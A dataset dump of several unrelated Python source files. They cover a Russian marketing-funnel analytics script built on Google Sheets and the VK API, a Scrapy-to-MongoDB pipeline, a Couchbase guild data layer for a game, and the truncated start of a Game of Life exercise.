datetime.date(int(stop[:4]), int(stop[5:7]), int(stop[8:10]))\n\n\n # this will give you a list containing all of the dates\n dd = [d1 + datetime.timedelta(days=x) for x in range((d2 - d1).days + 1)]\n for x in dd:\n datedelta.append(str(x))\n\n for i in range(len(datedelta)):\n datedelta[i]=datetime.date(int(datedelta[i][:4]), int(datedelta[i][5:7]), int(datedelta[i][8:10])).strftime(\"%d.%m.%Y\")\n\n costdfprice=[]\n for i in costdf.index:\n if costdf.loc[i,'Дата выдачи'] in datedelta:\n costdfprice.append(costdf.loc[i,'Стоимость '])\n costdfpriceinint = [int(item) for item in costdfprice if item.isdigit()==True]\n ipKOLICHESTVO = len(costdfprice)\n sumcostdf = sum(costdfpriceinint)\n return [ipKOLICHESTVO,sumcostdf]\n\n\n\ndef SMMcountfunct(start,stop,urlland):\n '''\n s1 = start[-2:] + '/' + start[-5:-3] + '/' + start[0:4]\n unixtime1 = time.mktime(datetime.datetime.strptime(s1, \"%d/%m/%Y\").timetuple())\n s2 = stop[-2:] + '/' + stop[-5:-3] + '/' + stop[0:4]\n unixtime2 = time.mktime(datetime.datetime.strptime(s2, \"%d/%m/%Y\").timetuple())\n vk_session = vk_api.VkApi()\n vk_session.auth()\n\n vk = vk_session.get_api()\n SMMM = vk.wall.search(owner_id=-25758, query=heshteg, count=100)\n newwww = []\n for i in range(len(SMMM['items'])):\n if SMMM['items'][i]['date'] > int(unixtime1) and SMMM['items'][i]['date'] < int(unixtime2):\n newwww.append(SMMM['items'][i]['id'])'''\n\n\n dfip=connectIP('https://docs.google.com/spreadsheets/d/1WBPvHdGxyaqzFwKAskt_CFq9rTdMGHnQMc-Dr9MVNwE/edit#gid=0')\n costdf = dfip[dfip.values == urlland].loc[:,['Дата старта промо','Ссылка на пост']]\n datedelta = []\n d1 = datetime.date(int(start[:4]), int(start[5:7]), int(start[8:10]))\n d2 = datetime.date(int(stop[:4]), int(stop[5:7]), int(stop[8:10]))\n\n\n # this will give you a list containing all of the dates\n dd = [d1 + datetime.timedelta(days=x) for x in range((d2 - d1).days + 1)]\n for x in dd:\n datedelta.append(str(x))\n\n for i in range(len(datedelta)):\n datedelta[i]=datetime.date(int(datedelta[i][:4]), int(datedelta[i][5:7]), int(datedelta[i][8:10])).strftime(\"%d.%m.%Y\")\n\n urltopost=[]\n for i in costdf.index:\n if costdf.loc[i,'Дата старта промо'] in datedelta:\n numberpost=re.search(r'[_].+',costdf.loc[i,'Ссылка на пост']).group(0)[1:]\n if numberpost.isdigit():\n urltopost.append(int(numberpost))\n\n vk_session = vk_api.VkApi()\n vk_session.auth()\n vk = vk_session.get_api()\n idreposts = []\n for i in urltopost:\n slova = vk.wall.getReposts(owner_id=-25758, post_id=i, count=1000)\n for i in range(len(slova['items'])):\n if slova['items'][i]['from_id'] < 0:\n idreposts.append(slova['items'][i]['from_id'])\n\n return len(idreposts)\n\n\n\ndef main():\n landing = Langing.objects.all()\n dictItog={}\n\n q = Queue(connection=conn)\n\n result = q.enqueue(analitica,str(landing[0].land),str(landing[0].success),str(landing[0].start),str(landing[0].end))\n result1 = q.enqueue(colvodneyforday,str(landing[0].start),str(landing[0].end),str(landing[0].land))\n try:\n connecttocomplete = googlesheets(str(landing[0].complete),str(landing[0].start),str(landing[0].end))\n except:\n connecttocomplete={}\n\n\n try:\n connecttargeting = connectsheet('https://docs.google.com/spreadsheets/d/1lcHMPIw1AtzKx3DoFAVp_JDi2Cb_-DbP9krjtD7c69Q/edit#gid=237212384',str(landing[0].start),str(landing[0].land))\n except:\n connecttargeting={}\n\n\n try:\n \n \n infopartenrilist=infopartnerip(str(landing[0].land),str(landing[0].start),str(landing[0].end))\n except:\n infopartenrilist={}\n\n\n try:\n SMMcount=SMMcountfunct(str(landing[0].start),str(landing[0].end),str(landing[0].land))\n except:\n SMMcount=0\n #time.sleep(8)\n\n print(\"REZULT\"*100)\n print(result.result)\n print(result1.result)\n print(connecttargeting)\n print(infopartenrilist)\n print(SMMcount)\n print(connecttocomplete)\n \n dictItog=result.result\n connecttocompleteresult=connecttocomplete\n if bool(connecttocompleteresult) ==True:\n regfactnomer=0\n for i in dictItog['Источник']:\n dictItog['Регистрациифакт'][regfactnomer]=connecttocompleteresult[i]\n regfactnomer+=1\n dictItog['Конверсия']=[str(int(dictItog['Регистрациифакт'][i]/dictItog['Трафикфакт'][i]*100))+'%' if dictItog['Трафикфакт'][i]!=0 else '0%' for i in range(len(dictItog['Источник']))]\n else:\n pass\n \n try:\n dictItog['Количество'][7]=result1.result[0]\n except:\n pass\n try:\n dictItog['Количество'][8]=result1.result[1]\n except:\n pass\n try:\n dictItog['Количество'][9]=result1.result[2]\n except:\n pass\n try:\n dictItog['Количество'][10]=result1.result[3]\n except:\n pass\n try:\n dictItog['Количество'][0]=result1.result[4]\n except:\n pass\n try:\n dictItog['Количество'][1]=result1.result[5]\n except:\n pass\n try:\n dictItog['Количество'][6]=result1.result[6]\n except:\n pass\n try:\n dictItog['Трафикфакт'][7]=connecttargeting['Трафикфакт']\n except:\n pass\n try:\n dictItog['Бюджетплан'][7]=connecttargeting['Бюджетплан']\n except:\n pass\n try:\n dictItog['Бюджетфакт'][7]=connecttargeting['Бюджетфакт']\n except:\n pass\n try:\n dictItog['Количество'][3]=infopartenrilist[0]\n except:\n pass\n try:\n dictItog['Бюджетфакт'][3]=infopartenrilist[1]\n except:\n pass\n try:\n dictItog['Количество'][2]=SMMcount\n except:\n pass\n\n a=[]\n try:\n for i in range(len(dictItog['Трафикфакт'])):\n if int(dictItog['Количество'][i])!=0:\n a.append(int(int(dictItog['Трафикфакт'][i]) / int(dictItog['Количество'][i])))\n else:\n a.append('—')\n dictItog[\"Сила\"]=a\n except:\n pass\n #ITOGO\n dictItog['Источник'].append('Итого')\n dictItog['Количество'].append('—')\n dictItog['Сила'].append('—')\n dictItog['Трафикфакт'].append(sum([int(item) for item in dictItog['Трафикфакт']]))\n dictItog['Регистрациифакт'].append(sum([int(item) for item in dictItog['Регистрациифакт']]))\n if dictItog['Трафикфакт'][-1]!=0:\n dictItog['Конверсия'].append(str(int(dictItog['Регистрациифакт'][-1]/dictItog['Трафикфакт'][-1]*100))+'%')\n else:\n dictItog['Конверсия'].append('0%')\n dictItog['Бюджетплан'].append('—')\n dictItog['Бюджетфакт'].append('—')\n print(dictItog)\n return dictItog\n\n\ndef main_for_new_funnel():\n dictItog = {}\n name_utm={\n 'Уникальный пакет промо': 'all / changellenge / unical-promo',\n 'Уникальная рассылка': 'email / generalbase',\n 'Digest рассылка по всей базе': 'email / digest',\n 'Рассылка по сборному сегементу через mailchimp (например, те кто кликал на стажировки)': 'email / segment-mailchimp',\n 'Рассылка по сборной базе под конкретный проект (например, ИТшники из Уфы, 3-4 курс) или Рассылка по базе партнера чемпионата ': 'email / segment',\n 'рассылка по базе кейсеров': 'email / segment / cup',\n 'рассылка по IT базе': 'email / segment / it',\n 'рассылка по базе инженеров': 'email / segment / engineers',\n 'рассылка по базе нефтяников': 'email / segment / oil',\n 'рассылка по базе бизнес': 'email / segment / business',\n 'рассылка по базе partials': 'email / segment / partials',\n 'Рассылка по новой базе hh': 'email / segment / external',\n 'Рассылка по базе курса первокурсника': 'email / segment / kp',\n 'Рассылка по старой базе hh': 'email / segment / old-external',\n 'Рассылка по базе финансистов и экономистов': 'email / segment / fin',\n 'Рассылка по базе менеджмента': 'email / segment / manager',\n 'Рассылка по базе аналитиков': 'email / segment / analytic',\n 'рассылка по базе региона Спб': 'email / segment / spb',\n 'рассылка по базе региона Сибирь': 'email / segment / siberia',\n 'рассылка по базе региона Урал': 'email / segment / ural',\n 'рассылка по базе региона Волга': 'email / segment / volga',\n 'рассылка по базе региона Дальний Восток': 'email / segment / dv',\n 'рассылка по базе Казахстана': 'email / segment / kz',\n 'рассылка по прошлогодней базе проекта': 'email / segment / last-year',\n 'рассылка по прошлогодней базе Аламни': 'email / segment / alumni',\n 'рассылка по прошлогодней базе Школы': 'email / segment / school',\n 'рассылка по прошлогодней базе Тулкита': 'email / segment / toolkit',\n 'рассылка по прошлогодней базе стажировок': 'email / segment / internship',\n 'рассылка по базе б2б партнеров (холодные)': 'email / hr-digest / cold',\n 'рассылка по базе б2б партнеров (теплые)': 'email / hr-digest / warm',\n 'таргетинг тизеры vk': 'target / vk / tizer',\n 'таргетинг в новостой ленте vk': 'target / vk / post',\n 'таргетинг в VK Stories': 'target / vk / story',\n 'таргетинг в новостой ленте instagram': 'target / insta / post',\n 'таргетинг в Instagram Stories': 'target / insta / story',\n 'таргетинг stories fb': 'target / fb / story',\n 'таргетинг в новостой ленте fb': 'target / fb / post',\n 'таргетинг на лидформу fb': 'target / fb / leadform',\n 'таргетинг на лидформу вк': 'target / vk / leadform',\n 'SMM:стена вк основная группа': 'vk / global / post',\n 'SMM:стена вк группа Спб': 'vk / spb / post',\n 'SMM:стена вк группа Сибири': 'vk / siberia / post',\n 'SMM:стена вк группа Урала': 'vk / ural / post',\n 'SMM:стена вк группа Волги': 'vk / volga / post',\n 'SMM:стена вк группа Казахстана': 'vk / kz / post',\n 'SMM:рассылка-дайжест ВК в ЛС': 'vk / global / digest',\n 'SMM:рассылка о кейс-чемприонатах ВК в ЛС': 'vk / global / cups',\n 'SMM:рассылка с вакансиями ВК в ЛС': 'vk / global / vacancy',\n 'SMM:рассылка о мероприятиях ВК в ЛС': 'vk / global / events',\n 'SMM:рассылка со статьями/полезными материалами ВК в ЛС': 'vk / global / article',\n 'SMM:стена клиентской группы ВК': 'post / (not set)',\n 'пост в телеграм-канале': 'tg / post',\n 'дайджест в телеграм-канале': 'tg / digest',\n 'ссылка на главном слайдере': 'cl-site / main / slider',\n 'ссылка на главной в разделе мероприятий': 'cl-site / main / events',\n 'ссылка на главной в разделе обучения/курсов': 'cl-site / main / education',\n 'ссылка на главной в разделе чемпионатов': 'cl-site / main / champs',\n 'пуш-уведомление на сайте': 'cl-site / push',\n 'ссылка на странице мероприятий': 'cl-site / page / event',\n 'ссылка на странице обучение': 'cl-site / page / education',\n 'ссылка на странице чемпионатов': 'cl-site / page / champs',\n 'ссылка на странице вакансии': 'cl-site / page / vacancy',\n 'поп-ап на сайте веб-версия': 'cl-site / popup / desktop',\n 'поп-ап на сайте мобильная версия': 'cl-site / popup / mobile',\n 'ссылка с личного кабинета': 'cl-site / main / personal',\n 'Ссылка по роликом на Yotube-канал': 'youtube / video',\n 'группа ФБ': 'fb / post',\n 'Страница АА в ФБ': 'fb / post / aa',\n 'Страница в Твиттере': 'twitter / post / aa',\n 'ссылка в БИО': 'inst / bio',\n 'ссылка в сториз': 'inst / stories',\n 'инфопартнеры:баннер на сайте': 'ip / banner',\n 'инфопартнеры:пост вконтакте': 'ip / vk-post',\n 'инфопартнеры:пост в Telegram': 'ip / tg-post',\n 'инфопартнеры:имейл рассылка': 'ip / email',\n 'инфопартнеры:статья или анонс на сайте': 'ip / article',\n 'инфопартнеры:пост в Twitter': 'ip / tw-post',\n 'инфопартнеры:пост в Instagram': 'ip / inst-post',\n 'инфопартнеры:пост в Facebook': 'ip / fb-post',\n 'Амбассадор договаривается о размещении на онлайн-ресурсах': 'amb / online',\n 'Амбассадор собирает офлайн-регистрации': 'amb / offline',\n 'Размещение в ЦРК': 'vuz / crk',\n 'Размещение в студсовете': 'vuz / studsovet',\n 'Размещение в профкоме': 'vuz / profkom',\n 'Размещение в кейс-клубе': 'vuz / kk',\n 'Размещение в медиа': 'vuz / media',\n 'Размещение в главной группе вуза': 'vuz / maingroup',\n 'Размещение для выпускников':'vuz / alumni',\n 'Размещение в бизнес-клубе': 'vuz / bk',\n 'Размещение на кафедре': 'vuz / kafedra',\n 'Размещение через преподавателей': 'vuz / teacher',\n 'Размещение в студенческом научном обществе': 'vuz / sno',\n 'Размещение через онлайн-аутсорс': 'vuz / online-outsors',\n 'Размещение через офлайн-аутсорс': 'vuz / offline-outsors',\n 'Роадшоу с флаерами/плакатами (регистрации по QR-коду)': 'vuz / flyer',\n 'Роадшоу с анкетами (с дальнейшей оцифровкой)': 'vuz / roadshow',\n 'Размещение в СМИ': 'smi /',\n 'прозвон по базе hh с отправкой рассылки': 'tlm / email / external',\n 'Прозвон по partials с отправкой рассылки': 'tlm / email / partials',\n 'Прозвон по базам прошлых лет с отправкой рассылки': 'tlm / email / last-year',\n 'Прозвон по каким-либо базам с отправкой рассылки': 'tlm / email',\n 'Прозвон с регистрацией на звонке': 'tlm / reg',\n 'Яндекс на поиске по брендовым запросам': 'yandex / cpc / brand',\n 'Яндекс РСЯ по брендовым запросам': 'yandex / cpm / brand',\n 'Яндекс на Поиске по запросам без упоминания бренда': 'yandex / cpc / general',\n 'Яндекс РСЯ по запросам без упоминания бренда': 'yandex / cpm / general',\n 'Google на поиске по брендовым запросам': 'google / cpc / brand',\n 'Google КМС по брендовым запросам': 'google / cpm / brand',\n 'Google на Поиске по запросам без упоминания бренда': 'google / cpc / general',\n 'Google КМС по запросам без упоминания бренда': 'google / cpm / general',\n 'Youtube контекст': 'youtube / cpm / general',\n 'Виртуальный рекрутер': 'external-lidgen / cpc / premium',\n 'Органика': '(direct) / (none)',\n\n }\n landing = Langing.objects.all()\n\n\n q = Queue(connection=conn)\n result =q.enqueue(analitica_new_funnel,str(landing[0].land), str(landing[0].success), str(landing[0].start),str(landing[0].end))\n\n\n result1=q.enqueue(colvodneyforday_new_funnel,str(landing[0].start), str(landing[0].end), str(landing[0].land))\n\n\n\n\n try:\n connecttocomplete = googlesheets_new_funnel(str(landing[0].complete), str(landing[0].start), str(landing[0].end))\n except:\n connecttocomplete = {}\n\n\n try:\n connecttargeting = connectsheet(\n 'https://docs.google.com/spreadsheets/d/1lcHMPIw1AtzKx3DoFAVp_JDi2Cb_-DbP9krjtD7c69Q/edit#gid=237212384',\n str(landing[0].start), str(landing[0].land))\n except:\n connecttargeting = {}\n\n try:\n\n infopartenrilist = infopartnerip(str(landing[0].land), str(landing[0].start), str(landing[0].end))\n except:\n infopartenrilist = {}\n\n try:\n SMMcount = SMMcountfunct(str(landing[0].start), str(landing[0].end), str(landing[0].land))\n except:\n SMMcount = 0\n #time.sleep(15)\n\n print(\"!\" * 100)\n print(result.result)\n print(\"!\" * 100)\n print(result1.result)\n print(\"!\" * 100)\n print(connecttocomplete)\n print(\"!\" * 100)\n print(connecttargeting)\n print(\"!\" * 100)\n print(infopartenrilist)\n print(\"!\" * 100)\n print(SMMcount)\n print(\"!\" * 100)\n\n\n #Concat analitica+colichestvo\n if result1.result is not None:\n for i in range(len(result.result['Источник'])-1):\n result.result['Количество'][i]=result1.result[name_utm[result.result['Источник'][i]]]\n\n\n\n dictItog = result.result\n\n connecttocompleteresult = connecttocomplete\n if bool(connecttocompleteresult) == True:\n for i in dictItog['Источник']:\n if i in connecttocomplete:\n dictItog['Регистрациифакт'][dictItog['Источник'].index(i)]=connecttocomplete[i]\n else:\n dictItog['Регистрациифакт'][dictItog['Источник'].index(i)]=0\n dictItog['Конверсия'] = [str(int(dictItog['Регистрациифакт'][i] / dictItog['Трафикфакт'][i] * 100)) + '%' if dictItog['Трафикфакт'][i] != 0 else '0%'for i in range(len(dictItog['Источник']))]\n else:\n pass\n\n\n if bool(connecttargeting) == True:\n for i in dictItog['Источник']:\n indexnumber=None\n if 'таргетинг' in i:\n indexnumber=dictItog['Источник'].index(i)\n break\n\n dictItog['Источник']=dictItog['Источник'][:indexnumber]+['Таргетинг общая информация']+dictItog['Источник'][indexnumber:]\n dictItog['Количество']=dictItog['Количество'][:indexnumber]+[0]+dictItog['Количество'][indexnumber:]\n dictItog['Сила']=dictItog['Сила'][:indexnumber]+['—']+dictItog['Сила'][indexnumber:]\n dictItog['Трафикфакт']=dictItog['Трафикфакт'][:indexnumber]+[connecttargeting['Трафикфакт']]+dictItog['Трафикфакт'][indexnumber:]\n dictItog['Регистрациифакт']=dictItog['Регистрациифакт'][:indexnumber]+[connecttargeting['Регистрациифакт']]+dictItog['Регистрациифакт'][indexnumber:]\n dictItog['Бюджетплан']=dictItog['Бюджетплан'][:indexnumber]+[connecttargeting['Бюджетплан']]+dictItog['Бюджетплан'][indexnumber:]\n dictItog['Бюджетфакт']=dictItog['Бюджетфакт'][:indexnumber]+[connecttargeting['Бюджетфакт']]+dictItog['Бюджетфакт'][indexnumber:]\n dictItog['Конверсия']=dictItog['Конверсия'][:indexnumber]+[connecttargeting['Конверсия']]+dictItog['Конверсия'][indexnumber:]\n\n\n if bool(infopartenrilist) == True:\n for i in dictItog['Источник']:\n indexnumber=None\n if 'инфопартнеры:' in i:\n indexnumber=dictItog['Источник'].index(i)\n break\n\n number_infopartenrilist_in_dict = 0\n for i in dictItog['Источник']:\n if 'инфопартнеры:' in i:\n number_infopartenrilist_in_dict+=1\n\n dictItog['Источник']=dictItog['Источник'][:indexnumber]+['Инфопартнеры общая информация']+dictItog['Источник'][indexnumber:]\n dictItog['Количество']=dictItog['Количество'][:indexnumber]+[infopartenrilist[0]]+dictItog['Количество'][indexnumber:]\n dictItog['Трафикфакт']=dictItog['Трафикфакт'][:indexnumber]+[sum([int(x) for x in dictItog['Трафикфакт'][indexnumber:indexnumber+number_infopartenrilist_in_dict]])]+dictItog['Трафикфакт'][indexnumber:]\n dictItog['Сила']=dictItog['Сила'][:indexnumber]+['—']+dictItog['Сила'][indexnumber:]\n dictItog['Регистрациифакт']=dictItog['Регистрациифакт'][:indexnumber]+[sum([int(x) for x in dictItog['Регистрациифакт'][indexnumber:indexnumber+number_infopartenrilist_in_dict]])]+dictItog['Регистрациифакт'][indexnumber:]\n dictItog['Бюджетплан']=dictItog['Бюджетплан'][:indexnumber]+['—']+dictItog['Бюджетплан'][indexnumber:]\n dictItog['Бюджетфакт']=dictItog['Бюджетфакт'][:indexnumber]+[infopartenrilist[1]]+dictItog['Бюджетфакт'][indexnumber:]\n dictItog['Конверсия']=dictItog['Конверсия'][:indexnumber]+['—']+dictItog['Конверсия'][indexnumber:]\n\n if SMMcount!=0:\n for i in dictItog['Источник']:\n indexnumber=None\n if 'SMM:' in i:\n indexnumber=dictItog['Источник'].index(i)\n break\n\n number_SMM_in_dict = 0\n for i in dictItog['Источник']:\n if 'SMM:' in i:\n number_SMM_in_dict+=1\n\n dictItog['Источник']=dictItog['Источник'][:indexnumber]+['SMM общая информация']+dictItog['Источник'][indexnumber:]\n dictItog['Количество']=dictItog['Количество'][:indexnumber]+[SMMcount]+dictItog['Количество'][indexnumber:]\n dictItog['Трафикфакт']=dictItog['Трафикфакт'][:indexnumber]+[sum([int(x) for x in dictItog['Трафикфакт'][indexnumber:indexnumber+number_SMM_in_dict]])]+dictItog['Трафикфакт'][indexnumber:]\n dictItog['Сила']=dictItog['Сила'][:indexnumber]+['—']+dictItog['Сила'][indexnumber:]\n dictItog['Регистрациифакт']=dictItog['Регистрациифакт'][:indexnumber]+[sum([int(x) for x in dictItog['Регистрациифакт'][indexnumber:indexnumber+number_SMM_in_dict]])]+dictItog['Регистрациифакт'][indexnumber:]\n dictItog['Бюджетплан']=dictItog['Бюджетплан'][:indexnumber]+['—']+dictItog['Бюджетплан'][indexnumber:]\n dictItog['Бюджетфакт']=dictItog['Бюджетфакт'][:indexnumber]+['—']+dictItog['Бюджетфакт'][indexnumber:]\n dictItog['Конверсия']=dictItog['Конверсия'][:indexnumber]+['—']+dictItog['Конверсия'][indexnumber:]\n\n #Сила\n a=[]\n try:\n for i in range(len(dictItog['Трафикфакт'])):\n if int(dictItog['Количество'][i])!=0:\n a.append(int(int(dictItog['Трафикфакт'][i]) / int(dictItog['Количество'][i])))\n else:\n a.append('—')\n dictItog[\"Сила\"]=a\n except:\n pass\n\n print(dictItog)\n\n return dictItog\n\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","sub_path":"Startpage/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":54653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"108810946","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport json\n\n\n# class ZhilianPipeline(object):\n#\n# def open_spider(self, spider):\n#\n# self.fp = open('beijing.txt','w',encoding='utf8')\n#\n#\n# def close_spider(self, spider):\n# self.fp.close()\n#\n# def process_item(self, item, spider):\n# dic = dict(item)\n# string = json.dumps(dic, ensure_ascii=False)\n# self.fp.write(string + '\\n')\n# return item\n\nimport pymongo\nclass MongoDBPipeline(object):\n def open_spider(self,spider):\n self.client = pymongo.MongoClient(host='localhost',port=27017)\n\n def close_spider(self,spider):\n self.client.close()\n\n def process_item(self,item,spider):\n dic = dict(item)\n db = self.client.zhilian\n city = dic['city_name']\n col = db.list_collection_names()\n if city in col:\n result = db[city].find({'hash_id': dic['hash_id']}).count()\n if result > 0:\n pass\n else:\n db[city].insert(dic)\n else:\n col = db[city]\n col.insert(dic)\n\n return item","sub_path":"spider/zhilian/zhilian/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"309730708","text":"import json\nimport logging\nimport random\n\nimport requests\n\nfrom cage.db import couchbase_db\nfrom cage import props\nfrom cage import utils\nfrom cage.server import config as server_config\nlogger = logging.getLogger(__name__)\n\ndef guild_with_name(guild_name):\n guild_name_lower = guild_name.lower()\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket') \n url = 'http://%s:8092/%s/_design/guild/_view/guild_view?key=\"%s\"&limit=1&skip=0' \\\n % (couch_host, couch_bucket, guild_name_lower)\n resp = requests.get(url)\n rows = resp.json()['rows']\n if rows:\n return next((row for row in rows if row['key'] == guild_name_lower), None)\n \n return None\n\ndef guilds_with_name(guild_name):\n guild_name_lower = guild_name.lower()\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket') \n #The \\u02ad in the endkey allows for partial searches \"MyCl\" returns MyClan \n url = 'http://%s:8092/%s/_design/guild/_view/guild_view?startkey=\"%s\"&endkey=\"%s\\u02ad\"&limit=50&skip=0' \\\n % (couch_host, couch_bucket, guild_name_lower, guild_name_lower)\n\n resp = requests.get(url)\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [row['value'] for row in rows]\n\n return []\n\ndef open_guilds():\n from cage.guild import utils as guild_utils\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket') \n url = 'http://%s:8092/%s/_design/guild/_view/open_guilds?startkey=%d&endkey=%d&limit=50&skip=0&ascending=true' \\\n % (couch_host, couch_bucket, 1, guild_utils.GUILD_MAX_SIZE - 5)\n\n resp = requests.get(url)\n\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [row['value']\n for row in rows\n ]\n return []\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef guild_get(client, guild_id):\n key = couchbase_db.guild_key(guild_id)\n result = client.gets(key)\n if result is None:\n return None\n\n guild_data, flags, cas = result\n guild_props = props.Props.from_json(guild_data)\n guild_props.cas = cas\n\n return guild_props\n\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef guild_set(client, guild):\n key = couchbase_db.guild_key(guild.id)\n\n# if guild.get('cas'):\n# result = client.cas(key, guild.to_json(), guild.cas)\n# else:\n result = client.set(key, guild.to_json())\n\n if result != 'STORED':\n raise Exception('Could not store guild for \"%s\" with guild \"%s result %s\"' %\n (key, guild, result))\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef guild_chat_get(client, guild_id):\n key = couchbase_db.guild_chat_key(guild_id)\n result = client.gets(key)\n if result is None:\n return []\n\n chat_messages, flags, cas = result\n guild_chat_list = json.loads(chat_messages)\n\n return guild_chat_list\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef guild_chat_set(client, guild_id, chat_messages):\n key = couchbase_db.guild_chat_key(guild_id)\n\n chat_messages = [ chat_message.to_dict() for chat_message in chat_messages]\n result = client.set(key, json.dumps(chat_messages))\n\n if result != 'STORED':\n raise Exception('Could not store guild chat messages for \"%s\" with guild \"%s result %s\"' %\n (key, chat_messages, result))\n\n\n@couchbase_db.with_client\ndef save_guild_member(client, guild_member):\n # set the value\n result = client.set(couchbase_db.guild_member_key(guild_member.guild_id, guild_member.player_id),\n guild_member.to_json())\n if result != 'STORED':\n logger.critical('Could not store guild member change for \"%s %s\"', guild_member.guild_id, guild_member.player_id)\n\n\n@couchbase_db.with_client\ndef get_guild_member(client, player_id, guild_id):\n member_data = client.get(couchbase_db.guild_member_key(guild_id, player_id))\n if member_data is None:\n return None\n\n member = props.Props.from_json(member_data[0])\n return member\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef delete_guild_member(client, key):\n result = client.delete(key)\n if result != 'DELETED':\n logger.critical('Could not delete guild member \"%s\" result %s', key, result)\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef delete_guild_member_with_ids(client, player_id, guild_id):\n result = client.delete(couchbase_db.guild_member_key(guild_id, player_id))\n if result != 'DELETED':\n logger.critical('Could not delete guild member \"%s\" result %s', couchbase_db.guild_member_key(guild_id, player_id), result)\n\n@couchbase_db.with_client\ndef save_guild_membership_action(client, guild_membership_record):\n # set the value\n result = client.set(couchbase_db.guild_membership_key(guild_membership_record.player_id),\n guild_membership_record.to_json())\n if result != 'STORED':\n logger.critical('Could not store guild membership change for \"%s\"', guild_membership_record.player_id)\n\n\n@couchbase_db.with_client\ndef get_guild_membership_action(client, key):\n membership_data = client.get(key)\n if membership_data is None:\n return None\n\n action = props.Props.from_json(membership_data[0])\n return action\n\n@utils.print_timing(logger)\n@couchbase_db.with_client\ndef delete_guild_membership_action(client, key):\n result = client.delete(key)\n if result != 'DELETED':\n logger.critical('Could not delete guild membership action \"%s\" result %s', key, result)\n\n@utils.print_timing(logger)\n@utils.statsd_timing()\ndef player_guild_membership_actions(player_id):\n \"\"\"\n Have there been changes to player's guild membership status (new invites, kicks from guild etc) since he was offline\n \"\"\"\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket')\n url = 'http://%s:8092/%s/_design/guild/_view/guild_membership_actions?key=\"%s\"' \\\n % (couch_host, couch_bucket, player_id)\n resp = requests.get(url)\n\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [(row['id'], props.Props(row['value'])) for row in rows] \n\n return []\n\n@utils.print_timing(logger)\n@utils.statsd_timing()\ndef guild_members(guild_id):\n \"\"\"\n List guild's members (including invited) \n \"\"\"\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket')\n url = 'http://%s:8092/%s/_design/guild/_view/guild_members?key=\"%s\"' \\\n % (couch_host, couch_bucket, guild_id)\n resp = requests.get(url)\n\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [(row['id'], props.Props(row['value'])) for row in rows] \n\n return []\n\n@utils.print_timing(logger)\n@utils.statsd_timing()\ndef player_guild_memberships(player_id):\n \"\"\"\n List player's relationships with guilds (where he's been invited etc) \n \"\"\"\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket')\n url = 'http://%s:8092/%s/_design/guild/_view/player_guild_memberships?key=\"%s\"' \\\n % (couch_host, couch_bucket, player_id)\n resp = requests.get(url)\n\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [(row['id'], props.Props(row['value'])) for row in rows] \n\n return []\n\n","sub_path":"src/cage/db/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":8482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"120789311","text":"## Mira Mastoras\n## November 25, 2016\n##\n## prog67.py\n\ndef count_live(row, column, grid):\n \"argument is row #, column # of cell and the whole grid\"\n \"counts number of neighboring live cells\"\n offsets = [[-1,-1],[-1,0],[-1,1],[0,-1],[0,1],[1,-1],[1,0],[1,1]]\n num_live_cells = 0 \n for x in offsets:\n y = grid[row + x[0]][column + x[1]]\n if y == 1:\n num_live_cells = num_live_cells + 1\n else:\n pass\n return num_live_cells\n \ndef does_cell_die(row, column, grid):\n \"argument is row #, column # of cell and the whole grid\"\n \"A live cell surrounded by < 2 live cells dies in the next cycle\"\n \"A live cell surrounded by >3 live cells dies in the next cycle\" \n \"returns true if cell dies, false if not\"\n num_live_cells = count_live(row,column,grid)\n if num_live_cells < 2:\n return True\n elif num_live_cells > 3:\n return True\n else:\n return False\n \ndef does_cell_live(row, column, grid):\n \"argument is row #, column # of cell and the whole grid\"\n \"A live cell surrounded by 2 or 3 live cells continues to live\"\n \"returns true if cell lives, false if not\"\n num_live_cells = count_live(row,column,grid)\n if num_live_cells == 2 or num_live_cells == 3:\n return True\n else:\n return False\n \ndef is_cell_born(row, column, grid):\n \"argument is row #, column # of cell and the whole grid\"\n \"A dead cell/ empty cell surrounded by 